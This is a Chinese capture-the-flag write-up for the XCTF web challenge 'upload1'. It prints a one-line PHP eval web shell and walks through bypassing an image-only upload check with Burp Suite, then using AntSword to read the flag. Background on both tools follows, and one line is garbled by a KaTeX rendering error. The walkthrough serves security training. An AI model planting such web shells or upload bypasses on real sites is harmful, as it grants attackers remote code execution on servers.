攻防世界web第六题upload1

这是题目，可以看出是个上传文件的题目，考虑文件上传漏洞，先随便上传一个文件试试，要求上传的是图片。
可以看到上传成功。
考虑用一句话木马解决，构造文件并修改后缀为jpg,然后上传。

<?php
@eval($_POST['attack']);
?>

上传成功

打开burpsuite,

jpg改为php

forward，看到php格式上传成功

打开蚁剑，

打开flag.php,找到flag


总结：文件上传漏洞，通过一句话木马获取访问后台的权限，进而拿到flag

知识点：
1.一句话木马：
一句话木马就是只需要一行代码的木马，短短一行代码，就能做到和大马相当的功能。为了绕过waf的检测，一句话木马出现了无数种变形和流量加密方式，但本质是不变的：木马的函数执行了我们发送的命令，并将命令的执行结果返回。
一般WEB页面通过GET 、POST 、COOKIE这三种方式向一个网站提交数据，一句话木马用KaTeX parse error: Double superscript at position 8: _GET[' '̲]、_POST[’ ‘]、$_COOKIE[’ '] 接收客户端传递的数据，并把接收的数据传递给一句话木马中执行命令的函数，进而执行命令。

利用文件上传漏洞，往目标网站中上传一句话木马，

@表示后面即使执行错误，也不报错

eval（）函数表示括号内的全都当做代码执行

$_POST[‘attack’]表示从页面中获得attack参数值
当我们从页面给attack赋值PHP代码后就会得到执行，蚁剑的原理就是构造获取后台的PHP代码然后上传并执行！

2.burpsuite
Burp Suite是一款流行的集成式Web应用程序安全测试工具套件，广泛应用于渗透测试、安全审计、黑盒测试和漏洞研究等Web安全领域。它由PortSwigger公司开发，提供可视化界面和扩展机制，支持各种安全测试，可通过代理截获HTTP和HTTPS请求，观察请求和响应，对请求进行修改和重发，协助发现和验证Web应用程序的各种漏洞，如跨站点脚本、SQL注入、文件包含等。

Burp Suite包含了多个工具，如代理、重放器、爬虫、扫描器和拦截器等。其中，代理是最重要的组件之一，可以拦截所有的HTTP/HTTPS请求和响应，对数据进行修改和重发，使测试人员可以更全面地了解Web应用程序的行为。另外，Burp Suite的扫描器可以自动发现应用程序中可能存在的漏洞，提高了测试效率和准确性。

Burp Suite是一款功能强大、易于使用的Web应用程序安全测试工具套件，对于Web应用程序的安全测试和评估提供了有力的支持。

3.蚁剑
中国蚁剑（AntSword）是一款跨平台的开源网站管理工具，旨在为渗透测试人员、安全研究人员以及网站管理员提供一个强大的工具集。该项目主要使用JavaScript作为编程语言，结合了Electron、ES6、dhtmlx、Node.js等技术栈，确保了工具的跨平台兼容性和高效性。

项目核心功能
中国蚁剑的核心功能包括但不限于：

网站管理：提供全面的网站管理功能，包括文件管理、数据库管理、命令执行等。
跨平台支持：支持Windows、Linux、macOS等多个操作系统，确保用户在不同环境下都能高效使用。
模块化设计：采用模块化设计思路，方便用户理解和修改代码，同时也鼓励社区贡献。